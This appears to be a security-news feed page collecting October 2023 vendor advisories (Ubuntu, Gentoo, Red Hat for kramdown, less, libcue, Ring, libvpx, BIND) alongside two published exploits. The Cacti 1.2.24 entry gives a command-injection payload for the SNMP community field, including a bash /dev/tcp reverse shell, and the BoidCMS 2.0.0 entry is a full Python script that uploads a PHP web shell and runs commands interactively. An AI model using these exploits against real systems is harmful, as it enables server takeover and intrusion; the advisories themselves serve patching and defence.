Ubuntu Security Notice 6424-1 - It was discovered that kramdown did not restrict Rouge formatters to the correct namespace. An attacker could use this issue to cause kramdown to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6424-1October 10, 2023ruby-kramdown vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:kramdown could be made to execute arbitrary code if it received speciallycrafted input.Software Description:- ruby-kramdown: Fast, pure-Ruby Markdown-superset converter - ruby libraryDetails:It was discovered that kramdown did not restrict Rouge formatters to thecorrect namespace. An attacker could use this issue to cause kramdown toexecute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   ruby-kramdown                   1.17.0-4ubuntu0.2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6424-1   CVE-2021-28834Package Information:   https://launchpad.net/ubuntu/+source/ruby-kramdown/1.17.0-4ubuntu0.2

Ubuntu Security Notice USN-6424-1

Gentoo Linux Security Advisory 202310-11 - A filtering bypass in less may allow denial of service. Versions greater than or equal to 608-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: less: Denial service  
     Date: October 10, 2023  
     Bugs: #893530  
       ID: 202310-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A filtering bypass in less may allow denial of service.

Background  
==========

less is a pager and text file viewer.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-apps/less  < 608-r2      >= 608-r2

Description  
===========

less suffered from a flaw in its terminal escape sequence handling which  
made its filtering incomplete.

Impact  
======

Malicious input could clear the terminal output or otherwise manipulate  
it with faked interactions.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All less users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/less-608-r2"

References  
==========

[ 1 ] CVE-2022-46663  
      https://nvd.nist.gov/vuln/detail/CVE-2022-46663

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-11

Cacti version 1.2.24 authenticated command injection exploit that uses SNMP options.

    # Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options# Date: 2023-07-03# Exploit Author: Antonio Francesco Sardella# Vendor Homepage: https://www.cacti.net/# Software Link: https://www.cacti.net/info/downloads# Version: Cacti 1.2.24# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container# CVE: CVE-2023-39362# Category: WebApps# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application# Vulnerability discovered and reported by: Antonio Francesco Sardella=======================================================================================Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)=======================================================================================-----------------Executive Summary-----------------In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.-------Exploit-------Prerequisites:    - The attacker is authenticated.    - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".    - A Device that supports SNMP can be used.    - Net-SNMP Graphs can be used.    - snmp module of PHP is not installed.Example of an exploit:    - Go to "Console" > "Create" > "New Device".    - Create a Device that supports SNMP version 1 or 2.    - Ensure that the Device has Graphs with one or more templates of:        - "Net-SNMP - Combined SCSI Disk Bytes"        - "Net-SNMP - Combined SCSI Disk I/O"        - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)    - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:        public\' ; touch /tmp/m3ssap0 ; \'    - Click the "Create" button.    - Check under /tmp the presence of the created file.To obtain a reverse shell, a payload like the following can be used.    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).----------Root Cause----------A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).----------References----------    - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp    - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html    - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti 1.2.24 Command Injection

Ubuntu Security Notice 6423-1 - It was discovered that CUE incorrectly handled certain files. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6423-1  
October 09, 2023

libcue vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

CUE could be made to execute arbitrary code if it received a specially  
crafted file.

Software Description:  
- libcue: CUE Sheet Parser Library - development files

Details:

It was discovered that CUE incorrectly handled certain files.  
An attacker could possibly use this issue to expose sensitive  
information or execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libcue2                         2.2.1-4ubuntu0.1

Ubuntu 22.04 LTS:  
  libcue2                         2.2.1-3ubuntu0.1

Ubuntu 20.04 LTS:  
  libcue2                         2.2.1-2ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6423-1  
  CVE-2023-43641

Package Information:  
  https://launchpad.net/ubuntu/+source/libcue/2.2.1-4ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libcue/2.2.1-3ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libcue/2.2.1-2ubuntu0.1

Ubuntu Security Notice USN-6423-1

Gentoo Linux Security Advisory 202310-10 - A vulnerability has been discovered in libcue which could allow for arbitrary code execution. Versions greater than or equal to 2.2.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libcue: Arbitrary Code Execution  
     Date: October 10, 2023  
     Bugs: #915500  
       ID: 202310-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in libcue which could allow for  
arbitrary code execution.

Background  
==========

libcue is a CUE Sheet Parser Library.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libcue  < 2.2.1-r1    >= 2.2.1-r1

Description  
===========

libcue does not check bounds in a loop and suffers from an integer  
overflow flaw which can be exploited to take over the program.

Impact  
======

Untrusted CUE sheet files can lead to arbitrary code execution.

app-misc/tracker-miners[cue] uses libcue to index CUE Sheet files in  
directories. It is possible that downloading a malicious CUE Sheet file  
into a directory indexed by tracker-miners could lead to remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libcue users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libcue-2.2.1-r1"

References  
==========

[ 1 ] CVE-2023-43641  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43641

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-10

BoidCMS versions 2.0.0 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/python3# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability# Date: 08/21/2023# Exploit Author: 1337kid# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://boidcms.github.io/BoidCMS.zip# Version: <= 2.0.0# Tested on: Ubuntu# CVE : CVE-2023-38836import requestsimport reimport argparseparser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')parser.add_argument("-u", "--url", help="website url")parser.add_argument("-l", "--user", help="admin username")parser.add_argument("-p", "--passwd", help="admin password")args = parser.parse_args()base_url=args.urluser=args.userpasswd=args.passwddef showhelp():  print(parser.print_help())  exit()if base_url == None: showhelp()elif user == None: showhelp()elif passwd == None: showhelp()with requests.Session() as s:  req=s.get(f'{base_url}/admin')  token=re.findall('[a-z0-9]{64}',req.text)  form_login_data={    "username":user,    "password":passwd,    "login":"Login",  }  form_login_data['token']=token  s.post(f'{base_url}/admin',data=form_login_data)  #=========== File upload to RCE  req=s.get(f'{base_url}/admin?page=media')  token=re.findall('[a-z0-9]{64}',req.text)  form_upld_data={    "token":token,    "upload":"Upload"  }  #==== php shell  php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']  with open('shell.php','w') as f:    f.writelines(php_code)  #====  file = {'file' : open('shell.php','rb')}  s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)  req=s.get(f'{base_url}/media/shell.php')  if req.status_code == '404':    print("Upload failed")    exit()  print(f'Shell uploaded to "{base_url}/media/shell.php"')  while 1:    cmd=input("cmd >> ")    if cmd=='exit': exit()    req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})    print(req.text)

BoidCMS 2.0.0 Shell Upload

Ubuntu Security Notice 6422-1 - It was discovered that Ring incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to execute arbitrary code. It was discovered that Ring incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6422-1October 09, 2023ring vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Ring.Software Description:- ring: Secure and distributed voice, video, and chat platformDetails:It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to execute arbitrary code.(CVE-2021-37706)It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to cause a denial of service.This issue only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.(CVE-2021-43299, CVE-2021-43300, CVE-2021-43301, CVE-2021-43302,CVE-2021-43303, CVE-2021-43804, CVE-2021-43845, CVE-2022-21723,CVE-2022-23537, CVE-2022-23547, CVE-2022-23608, CVE-2022-24754,CVE-2022-24763, CVE-2022-24764, CVE-2022-24793, CVE-2022-31031,CVE-2022-39244)It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to cause a denial of service.This issue only affected Ubuntu 20.04 LTS. (CVE-2022-21722)It was discovered that Ring incorrectly handled certain inputs. If a user oran automated system were tricked into opening a specially crafted input file,a remote attacker could possibly use this issue to cause a denial of service.(CVE-2023-27585)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   jami                            20230206.0~ds1-5ubuntu0.1   jami-daemon                     20230206.0~ds1-5ubuntu0.1Ubuntu 20.04 LTS:   jami                            20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1   jami-daemon                     20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1   ring                            20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1   ring-daemon                     20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   ring                            20180228.1.503da2b~ds1-1ubuntu0.1~esm1   ring-daemon                     20180228.1.503da2b~ds1-1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6422-1   CVE-2021-37706, CVE-2021-43299, CVE-2021-43300, CVE-2021-43301,   CVE-2021-43302, CVE-2021-43303, CVE-2021-43804, CVE-2021-43845,   CVE-2022-21722, CVE-2022-21723, CVE-2022-23537, CVE-2022-23547,   CVE-2022-23608, CVE-2022-24754, CVE-2022-24763, CVE-2022-24764,   CVE-2022-24793, CVE-2022-31031, CVE-2022-39244, CVE-2023-27585Package Information:   https://launchpad.net/ubuntu/+source/ring/20230206.0~ds1-5ubuntu0.1 https://launchpad.net/ubuntu/+source/ring/20190215.1.f152c98~ds1-1+deb10u2build0.20.04.1

Ubuntu Security Notice USN-6422-1

Red Hat Security Advisory 2023-5538-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5538-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5538  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
libvpx-1.7.0-10.el8_6.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_6.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_6.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_6.i686.rpm  
libvpx-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_6.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
libvpx-debuginfo-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.aarch64.rpm  
libvpx-devel-1.7.0-10.el8_6.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-devel-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.7.0-10.el8_6.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_6.s390x.rpm  
libvpx-devel-1.7.0-10.el8_6.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.s390x.rpm

x86_64:  
libvpx-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_6.x86_64.rpm  
libvpx-devel-1.7.0-10.el8_6.i686.rpm  
libvpx-devel-1.7.0-10.el8_6.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvgAAoJENzjgjWX9erEvkwP/30BCaL+HmyVp7332j2cpmqQ  
hOYjiHO3vT31sJZ1mn+EKzNNXKqL70D93SJyPOAc3cJGPYF58HTszil1gAQ+w6pk  
1kOAB1/baFHJ0GFWGXCfDXIVPMSTSOxk5yu8GpSxU6rcpP1VAJuw2ECzFYbcpnRA  
jeOvWnpqSiO6wLbv5sTd/Pn1Pbxv3GTdhyUbKJ2cLoJphn72Qw6NHAVPIgd3hpnP  
XT2E/er3QkLFC6vBvutyslj4mayhkILnwiRYRnBLgYIWKP/4wGcWf7BpqH7meqIL  
shHIAnaslGdxXDDL6f9OnqyisdHNNw6f23sNQUE12pdWfL/dn5Ll7fgVK6aVENUQ  
OgHajCjTiXKtchwAGLQrLG6ixXs5y8cRc/rIXWg8Hif982xxoiQfrkIYxLWaKgo4  
sMvvx6YdllQJAk3NabGG2zssv2KbAOy0s8o4AFlkiH+VaORx3XujJfZH5P/lkNAr  
EXF0Sw4RgBpDpG+l0qoDVmBmWYWIMup410ZfaVPPCWaqWH8Lce1f4UBK7Ump8jqM  
NLbw1W4qvKlGLleld/BSPNO80Ndv61zLEt8mBIG3ekzDHU+PKFFb23WgqsJbEcq/  
JOttoseX7aLNodLROUe/sRPZ+hzN0YMCKaJlOni71xdKiz/2vzldqslx/igtYOwn  
qWDfQ0JQIrk6IgmJXYvE  
=x93p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5538-01

Red Hat Security Advisory 2023-5527-01 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server ; a resolver library ; and tools for verifying that the DNS server is operating correctly. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: bind security update  
Advisory ID:       RHSA-2023:5527-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5527  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-3341   
=====================================================================

1. Summary:

An update for bind is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - noarch, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - noarch, x86_64  
Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - x86_64

3. Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain  
Name System (DNS) protocols. BIND includes a DNS server (named); a resolver  
library (routines for applications to use when interfacing with DNS); and  
tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: stack exhaustion in control channel code may lead to DoS  
(CVE-2023-3341)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, the BIND daemon (named) will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2239621 - CVE-2023-3341 bind: stack exhaustion in control channel code may lead to DoS

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

noarch:  
bind-license-9.11.13-6.el8_2.6.noarch.rpm  
python3-bind-9.11.13-6.el8_2.6.noarch.rpm

x86_64:  
bind-9.11.13-6.el8_2.6.x86_64.rpm  
bind-chroot-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debugsource-9.11.13-6.el8_2.6.i686.rpm  
bind-debugsource-9.11.13-6.el8_2.6.x86_64.rpm  
bind-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-lite-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-lite-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-chroot-9.11.13-6.el8_2.6.x86_64.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-9.11.13-6.el8_2.6.x86_64.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

noarch:  
bind-license-9.11.13-6.el8_2.6.noarch.rpm  
python3-bind-9.11.13-6.el8_2.6.noarch.rpm

ppc64le:  
bind-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-chroot-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-debugsource-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-devel-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-libs-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-libs-lite-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-lite-devel-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-devel-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-libs-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-utils-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-pkcs11-utils-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-sdb-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-sdb-chroot-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-sdb-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-utils-9.11.13-6.el8_2.6.ppc64le.rpm  
bind-utils-debuginfo-9.11.13-6.el8_2.6.ppc64le.rpm

x86_64:  
bind-9.11.13-6.el8_2.6.x86_64.rpm  
bind-chroot-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-debugsource-9.11.13-6.el8_2.6.i686.rpm  
bind-debugsource-9.11.13-6.el8_2.6.x86_64.rpm  
bind-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-export-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-9.11.13-6.el8_2.6.x86_64.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-libs-lite-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-lite-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-lite-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-devel-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-devel-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.i686.rpm  
bind-pkcs11-libs-debuginfo-9.11.13-6.el8_2.6.x86_64.rpm  
bind-pkcs11-utils-9.11.13-6.el8_2.6.x86_64.rpm  
